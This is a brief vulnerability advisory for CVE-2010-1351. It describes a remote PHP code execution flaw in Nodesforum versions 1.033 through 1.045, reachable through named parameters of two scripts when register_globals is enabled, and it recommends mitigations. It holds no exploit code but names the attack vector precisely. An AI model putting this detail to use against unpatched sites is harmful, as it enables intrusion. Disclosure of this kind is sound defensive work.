CVE-2010-1351

Name of the Vulnerable Software and Affected Versions Nodesforum versions 1.033 through 1.045

Description The issue allows remote attackers to execute arbitrary PHP code when register globals is enabled. This can be achieved via a URL in the nodesforum path from here to nodesforum folder parameter to erase user data.php and the nodesforum code path parameter to pre output.php.

Recommendations For versions 1.033 through 1.045, consider disabling the register globals setting to prevent exploitation. Additionally, restrict access to the erase user data.php and pre output.php scripts until a fix is available. Avoid using the nodesforum path from here to nodesforum folder and nodesforum code path parameters in these scripts until the issue is resolved.